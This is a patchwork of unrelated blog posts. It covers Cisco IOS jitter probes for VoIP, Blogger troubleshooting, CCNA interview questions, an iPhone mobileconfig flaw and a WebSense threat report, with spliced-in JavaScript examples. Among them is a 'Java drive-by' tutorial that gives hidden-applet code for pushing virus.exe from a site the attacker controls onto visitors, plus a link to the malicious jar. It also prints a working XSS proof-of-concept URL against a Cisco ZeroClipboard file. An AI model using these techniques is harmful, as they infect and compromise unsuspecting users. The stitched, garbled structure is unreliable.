Measuring Delay, Jitter, and Packet Loss for Voice-Enabled Data Networks. Your success or failure in deploying new voice technologies will depend greatly on your ability to understand the traffic characteristics of the network and then apply your knowledge to engineer the appropriate network configurations to control those characteristics.

Deploying Delay/Jitter Agent Routers

You can measure delay, jitter, and packet loss by deploying almost any Cisco IOS device, from a Cisco 800 Series Router on up. Two deployment scenarios are possible: You can either purchase dedicated routers for SLA measurements or use current routers within the network. Place the routers in a campus network along with hosts to provide statistics for end-to-end connections. It is not practical to measure every possible voice path in the network, so place the dedicated routers in typical host locations to provide a statistical sampling of typical voice paths.

In the case of VoIP deployments using traditional phones connected to Cisco routers using FXS station ports, the router to which the phones are connected also serves as the delay/jitter measurement device. Once deployed, the operation collects statistics and populates Simple Network Management Protocol (SNMP) MIB tables in the probe router. You can then access the data either through the CiscoWorks IPM, or through simple SNMP polling tools and other third-party applications. Additionally, after baseline values have been established, you can configure operations to send alerts to a network management system (NMS) station if thresholds for delay, jitter, and packet loss are exceeded.

Simulating a Voice Call

One of the strengths of using Cisco IOS SAA as the testing mechanism is that you can simulate a voice call. In Cisco IOS Software Release 12.3(4)T and later, you can configure the VoIP codec directly in the CLI and simulate a voice call. This release also includes voice quality estimates, Mean Opinion Scores (MOS), and Planning Impairment Factor (PIF) scores. Earlier versions of the Cisco IOS Software enable you to estimate a VoIP codec using the correct packet size, spacing, and interval for the measurement data and enter the appropriate parameters.

The CoS can be set on data or VoIP tests, which allows you to verify how well QoS is working in the network. Examples of how to simulate a voice call are shown below.

With Cisco IOS Software Release 12.3(4)T or later, you can use the VoIP jitter operation to simulate a test call:

rtr 1
type jitter dest-ipaddr 10.1.1.2 dest-port 14384 codec g711alaw
rtr schedule 1 start-time now

With IOS releases earlier than 12.3(4)T, you can use the even RTP/UDP port numbers in the range 16384 to 32766. The user then approximates 64 kbit/s: the packet size is 200 bytes (160 bytes of payload + 40 bytes for IP/UDP/RTP, uncompressed). You can simulate that type of traffic by setting up the jitter operation as shown below.
The jitter operation accomplishes the following:
  • Send the request to rtp/udp port number 14384
  • Send 172 byte packets (160 payload + 12 byte RTP header size) + 28 bytes (IP + UDP)
  • Send 3000 packets for each frequency cycle
  • Send every packet 20 milliseconds apart for a duration of 60 seconds and sleep 10 seconds before starting the next frequency cycle
The parameters in the example above give you 64 kbit/s for the 60-second test period.

((3000 datagrams * 160 bytes per datagram) / 60 seconds) * 8 bits per byte = 64 kbit/s

The configuration on the router would look like this:
rtr 1
type jitter dest-ipaddr 10.1.1.2 dest-port 14384 numpackets 3000 request-data-size 172
frequency 70
rtr schedule 1 start-time now

Note that IP+UDP is not included in the request-data-size, because the router adds those headers to the size automatically.
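The arithmetic behind these probe parameters, and the kind of statistics a jitter operation reports, as an added JavaScript example (this is not code from the article or from Cisco). The probe parameters are the article's; the round-trip samples are constructed, and the jitter figure is a simplification (mean absolute change between consecutive round-trip times) rather than the exact IP SLA computation:

```javascript
// Added example: bandwidth arithmetic for the jitter probe described in
// the article, plus delay/jitter/loss statistics over a constructed run.

// Probe parameters taken from the article's configuration.
const PROBE = { numPackets: 3000, payloadBytes: 160, intervalMs: 20 };

// Header sizes the article accounts for: request-data-size covers
// payload + RTP header; the router adds IP + UDP on the wire.
const RTP_HEADER = 12;
const IP_HEADER = 20;
const UDP_HEADER = 8;

// Value to put in request-data-size (payload + RTP header).
function requestDataSize(p) {
  return p.payloadBytes + RTP_HEADER;
}

// Datagram size on the wire (request-data-size + IP + UDP).
function wireSize(p) {
  return requestDataSize(p) + IP_HEADER + UDP_HEADER;
}

// Payload bit rate in kbit/s over one frequency cycle, i.e. the
// article's ((packets * bytes) / seconds) * 8 calculation.
function payloadKbps(p) {
  const seconds = (p.numPackets * p.intervalMs) / 1000;
  return (p.numPackets * p.payloadBytes * 8) / seconds / 1000;
}

// Statistics over one run. `rttsMs` holds one round-trip time per probe
// packet in milliseconds, or null for a packet that got no response.
function probeStats(rttsMs) {
  const answered = rttsMs.filter((r) => r !== null);
  const lost = rttsMs.length - answered.length;
  // Simplified jitter: mean absolute change between consecutive RTTs.
  let jitterSum = 0;
  for (let i = 1; i < answered.length; i++) {
    jitterSum += Math.abs(answered[i] - answered[i - 1]);
  }
  const avgRtt = answered.length
    ? answered.reduce((a, b) => a + b, 0) / answered.length
    : null;
  return {
    sent: rttsMs.length,
    lost,
    lossPercent: (lost * 100) / rttsMs.length,
    avgRttMs: avgRtt,
    // Without NTP the operation only knows round-trip time; the article
    // notes that one-way delay is approximated by halving it.
    approxOneWayMs: avgRtt === null ? null : avgRtt / 2,
    avgJitterMs: answered.length > 1 ? jitterSum / (answered.length - 1) : 0,
  };
}

// Constructed sample run: ten probe packets, one of them lost.
const SAMPLE_RTTS_MS = [40, 42, 41, 45, null, 44, 40, 41, 43, 42];

console.log(`request-data-size ${requestDataSize(PROBE)} bytes, ` +
  `${wireSize(PROBE)} bytes on the wire, ${payloadKbps(PROBE)} kbit/s`);
console.log(probeStats(SAMPLE_RTTS_MS));
```

Running it reproduces the article's figures (172-byte request-data-size, 200 bytes on the wire, 64 kbit/s) and, for the constructed run, a 10% loss with an average round-trip time of 42 ms.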

Delay/Jitter Probe Deployment Example

The two routers below would simulate voice calls of 64 kbit/s every 60 seconds and record delay, jitter, and packet loss in both directions. Note that the delay calculations are round-trip times and must be divided by two to arrive at the amount of one-way delay unless NTP is implemented for one-way delay measurements.

router1#
rtr responder
rtr 1
type jitter dest-ipaddr 10.1.2.1 dest-port 14384 codec g711alaw
tos 160
frequency 60
rtr schedule 1 start-time now

router2#
rtr responder
rtr 1
type jitter dest-ipaddr 10.1.1.1 dest-port 14385 codec g711alaw
tos 160
frequency 60
rtr schedule 1 start-time now

Command-Line Data Examples

To view the results you can use the IOS show command at the command line for the jitter operation. Additionally, you can use the command-line data for real-time monitoring and troubleshooting of delay, jitter, and packet loss. For an example of the CLI output, refer to cisco.com/packet/163_4b1.

Monitoring Thresholds

You can use the CLI, CiscoWorks IPM, or the WPU in CiscoWorks ITEM to configure features and monitor data. You can use this data to manage IP SLAs that have been created for VoIP. After you have determined baseline values, you can reconfigure the jitter operations to monitor the network. When predetermined delay and jitter service-level thresholds are reached or exceeded, NMS stations will be alerted.

After you have established baseline values through the initial data collection, you can monitor the delay, jitter, and packet loss levels in the network with the embedded alarm features of Cisco IOS SAA.

The Cisco IOS SAA threshold command sets the rising threshold (hysteresis) that generates a reaction event and stores history information for the operation. Cisco IOS SAA can measure and create thresholds for round-trip time delay, average jitter, connectivity loss, one-way packet loss, jitter, and delay.

Sample Service Assurance Threshold Configuration


router1#
rtr 100
rtr reaction-configuration 100 threshold-falling 50 threshold-type immediate action trapOnly
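The rising/falling behaviour the article describes for the reaction configuration, as an added JavaScript example (not code from the article or from Cisco IOS). The thresholds (rising 100 ms, falling 50 ms), the "trapOnly" action label and the series of per-cycle jitter values are constructed; the point is the hysteresis: one event when a value first reaches the rising threshold, none while it stays high, and one when it drops to the falling threshold:

```javascript
// Added example: a rising/falling threshold monitor with hysteresis, the
// behaviour the article attributes to the SAA reaction configuration.
// Thresholds, action label and measurements below are constructed values.

// A monitor raises one "rising" event when a measurement first reaches
// the rising threshold, stays armed while values remain high, and emits
// a "falling" event once a measurement drops to the falling threshold
// or below. Values in between do not generate events (hysteresis).
function createThresholdMonitor({ rising, falling, action }) {
  if (falling > rising) {
    throw new Error("falling threshold must not exceed rising threshold");
  }
  let above = false;
  return {
    // Feed one measurement; returns an event object or null.
    observe(value) {
      if (!above && value >= rising) {
        above = true;
        return { type: "rising", value, action };
      }
      if (above && value <= falling) {
        above = false;
        return { type: "falling", value, action };
      }
      return null;
    },
  };
}

// Run a series of measurements and collect the events with their index.
function evaluateSeries(values, config) {
  const monitor = createThresholdMonitor(config);
  const events = [];
  values.forEach((v, i) => {
    const ev = monitor.observe(v);
    if (ev) events.push({ index: i, ...ev });
  });
  return events;
}

// Constructed series: average jitter (ms) from successive probe cycles.
const JITTER_SERIES_MS = [40, 60, 120, 130, 70, 45, 110, 30];
const CONFIG = { rising: 100, falling: 50, action: "trapOnly" };

console.log(evaluateSeries(JITTER_SERIES_MS, CONFIG));
```

With the constructed series the monitor reports four events (rising at cycles 2 and 6, falling at cycles 5 and 7); the 130 ms reading after the first crossing and the 70 ms reading between the two thresholds produce nothing, which is what keeps an NMS from being flooded with traps while a link hovers around a threshold.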

Understanding the traffic characteristics of the network before you deploy new advanced applications is the key to successful implementations. Delay, jitter, and packet loss greatly affect VoIP applications. Your success or failure in deploying new voice technologies will depend greatly on your ability to understand the traffic characteristics of the network and then applying your knowledge to engineer the appropriate network configurations to control those characteristics.


DOM Based XSS In Microsoft

           
Lately, I have been researching DOM-based XSS a bit. In my previous post I talked about the DOM-based XSS I found inside AVG. DOM-based XSS is caused by a lack of input filtering inside client-side JavaScript; since most code is moving towards the client side, DOM-based XSS has become very common nowadays. It is predicted by the experts that DOM-based XSS mostly occurs in websites that rely heavily on JavaScript.

I have reported several DOM based XSS inside Microsoft, most of them were due to the lack of input filtering/sanitization inside of the several tracking scripts such as sitecatalyst and riotracking scripts as they often introduce some vulnerable sources and sinks. With that being said, let's take a look at the POC of the attack:


The vulnerability occurs due to a lack of filtering inside the riotracking script (line 58). There are other Microsoft domains that are also using the same tracking script and are vulnerable to DOM-based XSS; see if you can find one.


How Attackers Spread Malware With Java Drive by?


Hello RHA fans,

We are back with a new tutorial. Well making a malicious virus is one thing but how to spread it? Or how hackers hunt for victims? Well you will definitely be disappointed when you’ll know that this trick fails sometimes! Victims are now mostly aware of the old social engineering stuff.  But cheers up my friend there's no end, i will show you a very effective methods that attackers use to spread malicious viruses/worms.



Well In this tutorial RHA will show you to spread virus with JAVA DRIVE BY!

What is java drive by:

A Java Drive-By is a Java applet placed on a website. Once you click "Run" on the pop-up, it downloads a program from the internet. This program can be used to spread a virus or malware effectively and has been spotted in the wild. Attackers can execute .exe files on a victim's computer without their permission with the help of a Java drive-by. You can see the image of the error below:

Okay so whats the scenario behind this? well this is a java script in the source which pop ups the error, So lets learn how to do the job.

Tools we need in this game are:

i) a .jar file which is the main player of this game. Download it from here http://www.mediafire.com/?mmafl2carb1s159
ii) A shelled web where you will upload files for JAVA DRIVE BY! Plus you should know basic HTML to make a attractive web page.
iii) A java script which is the backbone of your game.

Now lets get started, Upload you .jar file on the shelled web, than create a fake webpage its up to you how you much you make fake webpage attractive, but you have to add the java code due to which the pop up error will appear

Java Code: 

<APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0">
    <PARAM NAME = "AMLMAFOIEA" VALUE = "http://www.yoursite.com/virus.exe">


So add the above code in your face webpage, just make some changes replace VALUE = "http://www.yoursite.com/virus.exe" with your virus like the image below:

 So this is it! Simplest and most effective method used by attackers to spread your malicious software.

 About the author

This article has been written by Fahad Awan. He is the newest author on the RHA team. We wish him the best of luck with his tutorials.

Interview questions for fresher network engineer: Tips and Tricks for CCNA, CCNP, OSPF, BGP, MPLS-VPN | Ask all your queries online absolutely free

This is a guest post from Mr. Shivlu Jain. He runs a blog related to MPLS VPN.

If you have any concerns or questions related to any protocol or networking technology, you can visit his blog and just leave a comment. All your questions will be answered by professionals absolutely free.


The market is booming: almost every company has opened its doors for new positions, and everyone is looking for a change to grab new positions with new challenges. So make sure that you have prepared answers for the questions below before your interview. The questions are generic and will make a very good impression on the interviewer if you answer them in an organised and structured manner. The IGP interview questions below are for CCNA and CCNP engineers.

1. What is the difference between RIPv1 and RIPv2?
2. How many routes can a RIP packet carry?
3. Is OSPF a link-state, distance-vector, or path-vector protocol?
4. What is the difference between OSPF and IS-IS, and which one is preferred?
5. Can we use BGP instead of an IGP?
6. How many network types are available in OSPF?
8. LSA 3 and LSA 4 are generated by which router?
9. When should a Stub area or a Not So Stubby Area be used?
10. How can external routes be obtained without making the area Not So Stubby?
11. What types of route summarization are available in OSPF?
12. Why is summarization needed?
13. A major network is advertised as a summary in one area, and a few routes from that network are configured in another area. What happens in that case?
14. If an OSPF area is not stabilized, does it impact another area?
16. External routes are present in the OSPF database but are not being installed in the routing table. Why?
17. If no loopback is configured, which router-id will the OSPF process select?
18. Can we run multiple OSPF processes on a single router, and what is the advantage of doing so?
19. What are the OSPF timers?
20. Which multicast addresses are used by OSPF?
21. At which layer does OSPF work?
22. What is the backbone area in OSPF?
23. Can we use OSPF without a backbone area?
24. Is it required that the OSPF router-id be reachable in the IGP cloud?
25. After configuring a new router-id, is it used automatically, or is a command needed to make it operational?
26. Why is the secondary IP address of an interface not advertised in the IGP cloud?
27. OSPF neighbourship is not coming up. Describe the steps to troubleshoot it.
28. One side has an MTU of 1500 and the other side an MTU of 1600. Does it affect neighbourship?
29. Describe the DR and BDR election process.
30. If the DR goes down and no BDR is configured, what happens?
31. What is the difference between a neighbor and an adjacent neighbor?
32. My OSPF neighbourship is showing 2-way. What does it mean?
33. Define the different OSPF neighbor states.


Blogger Blogs Displaying Mysterious "SECURITY WARNING" Popup Boxes

This week, we're seeing a few concerned blog owners, in Blogger Help Forum: Something Is Broken, asking about a mysterious SECURITY WARNING popup box, on their blogs.

Like the earlier concern about the transparent boxes covering the blog, this appears to be another broken FaceBook Connect gadget.

The mysterious SECURITY WARNING isn't too hard to resolve.

Generally, the problem will start with a new FaceBook accessory, recently added.

<div id="fb-root"></div>
<script>(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = "//connect.facebook.net/id_ID/all.js#xfbml=1";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>

<div class="fb-like-box" data-href="http://www.facebook.com/xxxxxxx" data-width="265" data-show-faces="true" data-stream="true" data-header="true"></div>

If you can identify the problem gadget in your blog, you can edit the gadget, and Remove it. Some owners have installed the code in question, in a specific post.

As an alternate solution, you may add CSS which will hide the warning. Using the "Add CSS" wizard in the Template Designer Advanced menu, add the following code:
#fb_xdm_frame_http, #fb_xdm_frame_https
{
display:none !important;
}

As always, after you add or remove the code in question, and save the changes, you will need to clear browser cache and restart the browser, to accurately test success in resolving the problem.


Recovering A Deleted Page Or Post, Chapter 2

Blog owners have been deleting their pages and posts, then changing their minds later, since Blogger started providing the ability to delete pages and posts.

We've been advising anxious blog owners, for some time, how to recover deleted pages and posts. The easiest solution, in the long run, is to recover the PageID / PostID, and re publish the deleted page / post.

When the deleted page or post cannot be re published, the next option is to re build the page / post, possibly using feed cache.
Using this technique, you'll have to reformat the post content, as feed content is formatted relatively simply. When you publish the post, it will publish as a new post, with a new URL - so any external references to the missing post URL will still be broken.
Thanks to the recently offered Custom Redirects option, though, we can make this latter choice slightly less undesirable.

When a deleted page or post has to be rebuilt from the beginning, the classic prognosis was not good.
  1. The content is retrieved or rewritten, then re formatted.
  2. The page / post is re published, but under a new URL.
  3. The readers, and the search engines, adjust to the new URL being used.
For many blog owners, issue #3 is the cruelest blow - as the blog suffers reputation loss, from readers and search engines seeing
404 Not Found
for the deleted page / post.

Given enough determination and time, the blog owner can get through issues #1 and #2 - but issue #3 is the gift that just keeps on giving. Using Custom Redirects, though, that does not have to be the case.

It's a simple solution - and your readers and the search engines don't have to do anything unusual.
  1. Rebuild the page / post, using a carefully chosen Title / URL.
  2. Add a Custom Redirect.
    • From: The deleted (previously published) URL.
    • To: The new (re published) URL.
  3. The readers, and the search engines can view the re built page / post contents using the old URL - and update their record of the URL, as convenient to them, to point to the new URL. And the page / post never goes offline.
And you, the blog owner, can get back to work on new pages and posts.


Confusion About Advice "If you bought your domain name from Blogger, you won't need to create a CNAME record."

To Blogger blog owners who want their new non BlogSpot URLs to display their blogs, this conflicting bit of advice provides only confusion and doubt.
If you bought your domain name from Blogger, you won't need to create a CNAME record.

That advice was written to advise the use of the Blogger "Buy a domain" wizard, which provides non BlogSpot URLs for Blogger blogs, through a simple 15 minute purchase process. In September 2012, that simple process changed, slightly.

If you are trying to re publish your blog to a non BlogSpot URL - and you are seeing an "Error 12" / "Error 32", or similar message in the Publishing wizard display - you need to add a second "CNAME" address to your domain.

The new "CNAME", added in September 2012, allows you to verify ownership of the domain to the Publishing wizard. Any time you re publish your blog to a non BlogSpot URL, you have to verify ownership. This prevents people who are not you from deviously publishing their Blogger blog to your domain.

If you are reading this, and you are the owner of any website which provides advice on how easy it is to purchase a non BlogSpot URL for a Blogger blog - and part of your advice mentions
If you bought your domain name from Blogger, you won't need to create a CNAME record.
Please, edit your instructions to reflect the reality of domain ownership verification.

If you are reading this, and you know of a blog or website which provides the confusing advice
If you bought your domain name from Blogger, you won't need to create a CNAME record.
let us know, below.

Try and reduce the confusion, when people have to re publish their blog, after using the Blogger Publishing wizard - or possibly after buying directly from a registrar. Help us, to help you.


Cisco ZeroClipboard Swf File XSS


The security of the target website depends upon the number of vectors an attacker knows: the more vectors an attacker knows, the more chances he has of compromising your website. One of the reasons why I have managed to secure my place in most of the security halls of fame is that I did not try a single attack vector; I tested the target for lots of different attack vectors, one of them being SWF. SWF files are commonly found on most websites. Though there are lots of other vulnerabilities in SWF files, I will stick to the topic of this post and leave the others for upcoming posts.
Recently, I was testing Cisco for potential vulnerabilities. Initially I tested for SQLi, XSS, CSRF and other attacks, but was out of luck. Therefore, I decided to test it for SWF file vulnerabilities. One of the common SWF vulnerabilities I look for on a website is the "ZeroClipboard XSS".

What Is ZeroClipboard?

The ZeroClipboard library provides an easy way to copy text to the clipboard using an invisible Adobe Flash movie, and a JavaScript interface. The "Zero" signifies that the library is invisible and the user interface is left entirely up to you.


I used Google to search whether any of Cisco's subdomains, or cisco.com itself, contained this file. Luckily I found a path on bx.cisco.com that contained ZeroClipboard.swf, so I began testing for XSS, and bingo, it worked.


Cisco Swf POC

http://bx.cisco.com/cbx-portal/js/zeroclipboard/ZeroClipboard.swf#?id=\"))}catch(e){alert(/XSSbyrafay/.source);}//&width=500&height=500


Vulnerable Code

public function ZeroClipboard()
{
    ....
    var flashvars:Object = LoaderInfo(this.root.loaderInfo).parameters;
    id = flashvars.id;
    ....
    ExternalInterface.call("ZeroClipboard.dispatch", id, "load", null);
}
As the code above shows, the id parameter taken from the flashvars is passed straight into ExternalInterface.call as its second argument without being sanitized, which results in an XSS.
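The two output contexts behind the DOM-based XSS cases on this page (the HTML context written by a script sink in the Microsoft tracking-script post above, and the JavaScript string context of the ExternalInterface.call argument here), as an added JavaScript example that is neither the ZeroClipboard project's code nor the author's. The page's PoC ends the id value with a backslash followed by a quote; the naive escaper below shows why escaping quotes alone does not keep such a value inside a string literal, and the allowlist check is the kind of validation an application should apply to an element id before handing it to ExternalInterface. Flash's own serialization is not reproduced, and the element ids used as input are constructed:

```javascript
// Added example: output-context handling for the two XSS cases discussed
// on this page. Element ids and fragment values below are constructed.

// --- JavaScript string context (the ZeroClipboard `id` parameter) ---

// Escaping only double quotes is not enough: an input ending in a
// backslash followed by a quote becomes backslash-backslash-quote,
// which closes the string literal early.
function naiveQuoteEscape(s) {
  return '"' + s.replace(/"/g, '\\"') + '"';
}

// A correct JavaScript string literal: backslashes, quotes, newlines and
// line terminators are all escaped. JSON.stringify is sufficient here.
function jsStringLiteral(s) {
  return JSON.stringify(s);
}

// Report whether a supposed string literal terminates before its final
// character, i.e. whether an unescaped quote occurs inside it.
function literalClosesEarly(literal) {
  for (let i = 1; i < literal.length - 1; i++) {
    if (literal[i] === "\\") { i++; continue; } // skip the escaped character
    if (literal[i] === '"') return true;
  }
  return false;
}

// Allowlist for what a DOM element id used as a clipboard client needs.
const ID_PATTERN = /^[A-Za-z][A-Za-z0-9_-]{0,63}$/;
function isSafeClientId(id) {
  return ID_PATTERN.test(id);
}

// --- HTML context (a DOM sink such as innerHTML fed from location.hash) ---

// Characters that change meaning when written into HTML.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[c]));
}

// Markup a page might build for a fragment-derived value, escaped so the
// value renders as text instead of being parsed as HTML.
function safeMessageMarkup(fragmentValue) {
  return '<p class="msg">' + escapeHtml(fragmentValue) + "</p>";
}

// Constructed inputs.
const BREAKOUT_ID = 'x\\"';          // ends with a backslash and a quote
const NORMAL_ID = "clip_button_1";
const FRAGMENT = '<b>hi</b> & "bye"';

console.log(literalClosesEarly(naiveQuoteEscape(BREAKOUT_ID)));  // true
console.log(literalClosesEarly(jsStringLiteral(BREAKOUT_ID)));   // false
console.log(isSafeClientId(BREAKOUT_ID), isSafeClientId(NORMAL_ID));
console.log(safeMessageMarkup(FRAGMENT));
```

The allowlist is the stronger control for the ZeroClipboard case, because the id never needs anything beyond the characters a DOM id uses; the escaping functions illustrate the general rule that encoding has to match the context the value lands in (a JavaScript string literal versus HTML text), and that quote escaping without backslash escaping is incomplete.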

Further Reading

If you are really interested in learning about zeroclipboard xss, i would recommend you read the following articles:

http://lcamtuf.blogspot.com/2011/03/other-reason-to-beware-of.html
https://github.com/jonrohan/ZeroClipboard/issues/14

Vulnerability Discovered In iPhone - Poses Serious Threat To Users



Another vulnerability has been discovered in the iPhone that could allow hackers to remotely control it. Skycure, an Israeli company, states it to be a major flaw in iOS configuration which could pose a malware threat.

A file type known as mobileconfig is being abused through this vulnerability. These files are used by phone carriers to configure system-level settings including WiFi, VPN, email and APN.

Skycure's CEO, Adi Sharabani, has taken the exploit for a test drive to explain how an iPhone can be controlled while retrieving the victim's location and other sensitive information.




Ways to get infected:

  1. Victims browse to an attacker-controlled website, which promises them free access to popular movies and TV-shows. In order to get the free access, “all they have to do” is to install an iOS profile that will “configure” their devices accordingly.
  2. Victims receive a mail that promises them a “better battery performance” or just “something cool to watch” upon installation.

To avoid this attack one must follow these rules:

  • You should only install profiles from trusted websites or applications.
  • Make sure you download profiles via a secure channel (e.g., use profile links that start with https and not http).
  • Beware of non-verified mobileconfigs. While a verified profile isn't necessarily a safe one, a non-verified one should certainly raise your suspicion.

Cheers!

About the Author:
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

Accounts Locked For Unusual Account Activity

One of the more intriguing tales of Blogger blogs, currently being explored, involves blogs mysteriously deleted by Blogger.
My blog just disappeared from my dashboard - and no, it's not listed under "Deleted blogs"!
In some cases, the owner knows more than is implied, from the obvious wording of that problem report.

As Blogger / Google continues to improve the hacking / malware detection and removal process, they are making the recovery of accounts locked for "suspicious" / "unusual" activity easier - and more transparent. The increased transparency may, in some cases, cause mystery.

Diagnosing the many mysterious blog disappearances, currently being reported in Blogger Help Forum: Something Is Broken, may involve what the blog owner does not report - as much as what the owner does report.

Hacking Detection / Recovery is constantly being improved.

Blogger / Google is constantly refining the hacking detection / recovery process, to both improve the possibility that any activity will be detected, and to make it easier for the victims of the hacking to deal with the recovery process. As they make it easier for the owners to recover the accounts locked, they make it less likely that the owners will mention the locked account recovery, when later reporting the blogs, mysteriously missing from the dashboard.

Some owners will provide vague clues, alluding to hacking detection.

In some cases, the blog owner will provide vague clues, which refer to an immediately previous account unlock.
  • Required to change the account password.
  • Required to provide a phone number - and receive either a text or voice message with a recovery code.
  • Required to solve a CAPTCHA.
All of these clues can be relevant to a locked account, or to various other anti-hacking / anti-spam activity by Blogger / Google - and can be overlooked as a locked account symptom, when stated in a forum problem report.

Other times, only the circumstances identify the situation.

In other cases, the only clue provided will be that the blogs in question are missing, and not listed in any dashboard list - "Deleted blogs", "Locked blogs", or "My blogs". In cases where we've simply reported missing blogs for malware / spam review, to Blogger Support, we're later advised to instruct the blog owner to recover the account.

Every owner does not always appreciate the diagnostic process.

Since immediate review of any blog cannot be always guaranteed by Blogger Support, it's to everybody's benefit that we request clues to verify the problems being reported. Unfortunately, the questions asked may not always seem relevant to some blog owners, unhappy about the mysterious loss of their blogs - even though they may contribute to the problem, inadvertently.

All owners won't even get email, alerting them to action taken.

And thanks to the possibility that not all blog owners may even get a notice when their accounts are locked, owners with multiple accounts may not even realise that a given Blogger account is locked. These owners find out that a given blog has been deleted, only after it goes offline and expires from cache. This will make some blog owners even less cooperative, when asked to provide diagnostic details about their problems.

600% Increase In Cyber Attacks: WebSense Releases Threat Report 2013

One thing I love more than writing is online threat reports - all the blood, sweat and tears combined with the satisfaction of discovery and elimination of the threat. Ahh! The moment you come to the realisation that there are smarter people in this world who can shoot you point-blank without ever being caught. Yes, brutality is the name, the name of the game!


WebSense has kept up to speed in this game and they have released a report to show for it. WebSense has released the 2013 Threat report enumerating an analysis on cyber threats. According to WebSense, cyber threats have increased over the years due to usage of ancient security protocols. Attackers are able to easily bypass these mechanisms and target mobile platforms and social media, the two most celebrated inventions of this century.

The Internet has been reported to be the 'attack vector and the primary support element of other attack trajectories'. Malicious websites have grown in number (almost 600%), and 85% of these are being hosted by legitimate but compromised providers.

Genre of sites that were mainly attacked were:

  • Information Technology
  • Business and Economy
  • Sex
  • Travel
  • Shopping

Probably because attackers wanted to cover all areas of human psyche and, in general, life? No wonder the number of threats and attacks have increased.

- Social Media was one of the most exploited channels due to its large audience. Most of the links consisted of malicious content which were spread through the network. New features and interfaces also resulted in some amount of confusion leading to successful attacks on the user.

- Mobile platforms were again easily attacked due to jailbreaking, and the download and installation of malicious apps.

Legitimate apps were also a cause for concern; many proved less secure than expected. Consider a study by Philipps University and Leibniz University in Germany involving 13,500 free apps downloaded from Google Play. Researchers found that 8 percent of these apps were vulnerable to man-in-the-middle attacks, and approximately 40 percent enabled the researchers to capture credentials for American Express, Diners Club, Paypal, bank accounts, Facebook, Twitter, Google, Yahoo, Microsoft Live ID, Box, WordPress, remote control servers, arbitrary email accounts, and IBM Sametime, among others.
WebSense stated that malicious apps mainly require three permissions:
  • 82% of malicious apps send, receive, read or write SMS message.
  • 12.5% malicious apps require RECEIVE_WAP_PUSH permission.
  • 10% malicious apps asked for permission to install other apps.
- Email was another vector that came to WebSense's notice, as only 20% of the emails sent and received were legitimate; 80% were phishing and spam emails. It is very easy to fall prey to such attacks because the links present in these emails seem to be from "real people" but actually lead to compromised websites, or the attachments in them are infected.


Report also introduced "time-delay" attack, "in which embedded web links are kept benign until after traditional email security defences are bypassed".

According to WebSense the following categories of malicious web links are present in Spam Email:
  • Potentially Damaging Content | Suspicious sites with little or no useful content.
  • Web and Email Spam | Sites used in unsolicited commercial email.
  • Malicious Websites | Sites containing malicious code.
  • Phishing and other Frauds | Sites that counterfeit legitimate sites to elicit user information.
  • Malicious Embedded iFrame.
You can read the full report by WebSense, which clearly states:

“Solutions that focus solely on mobile, email, web or otherwise can no longer be trusted to defend against complex, multistage attacks that can move between attack vectors.”

Wise friends, we are no longer... ALONE!

Cheers!

About the Author:
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.
